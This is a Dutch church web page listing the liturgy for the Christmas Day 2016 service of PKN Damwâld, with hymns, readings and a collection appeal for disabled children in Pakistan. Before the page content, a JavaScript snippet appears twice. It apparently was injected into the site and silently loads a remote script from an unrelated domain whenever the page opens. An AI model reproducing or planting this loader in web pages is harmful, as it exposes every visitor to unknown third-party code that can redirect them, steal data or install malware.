;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst 1e Kerstdag - PKN Damwâld
zondag 25 december 2016
09:30 uur

Kerkdienst 1e Kerstdag

vg_-01

Informatie

Voorganger:G. Timmer
Organist:Ivo van Hijum
Liturgie
Lied voor de dienst ELB 109: 1, 2, 3 en 4
Welkom en Mededelingen
Intochtslied Gezang 138: 1, 2, 3 en 4
Stil gebed, bemoediging en groet .
Loflied Gezang 399: 1 en 4
Gebed .
We zingen: Gezang 141: 1, 2 en 3
We lezen uit de Bijbel : Lukas 2: 1-7 en Efeze 2: 11-22
We zingen: Psalm 72: 1,2 en 3
Verkondiging: “Hij is onze vrede”
We zingen: ELB 79: 1, 2 ,3 en 4
Geloofsbelijdenis .
We zingen: Psalm 8: 1, 2 en 6
Dankgebed en voorbeden .
Collecte
Slotlied ELB 101
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Kinderen in de knel

Geef liefde aan kinderen met een handicap in Pakistan
Vandaag collecteren we voor verstandelijk beperkte kinderen in Pakistan. In de kleine, arme, plattelandsdorpen in Pakistan is bijna geen zorg voor kinderen met een handicap. De ouders weten niet goed hoe ze met hun gehandicapte kind om moeten gaan. Ze verbergen hun kinderen. Ze schamen zich. Sommigen zien de handicap zelfs als een straf van God. De christelijke organisatie NOAD helpt en steunt deze ouders en hun kinderen om hen een volwaardig plekje in het gezin en de samenleving te geven. Dat doen zij door kennis te delen met de ouders over de rechten van hun kind, de juiste medische zorg en ze laten zien hoe hun kinderen door liefde, zorg en aandacht zich beter ontwikkelen. Ze bloeien op, ze lachen weer. Met uw gift helpt u mee om Pakistaanse kinderen met een handicap een plekje in hun gezin en in de dorpsgemeenschap te geven. Door de broodnodige liefde, zorg en aandacht. Als kinderen van God, kinderen die gezien mogen worden. Geef liefde, geef uw gift.

Tweede collecte: Kerk
Uitganscollecte: Kerk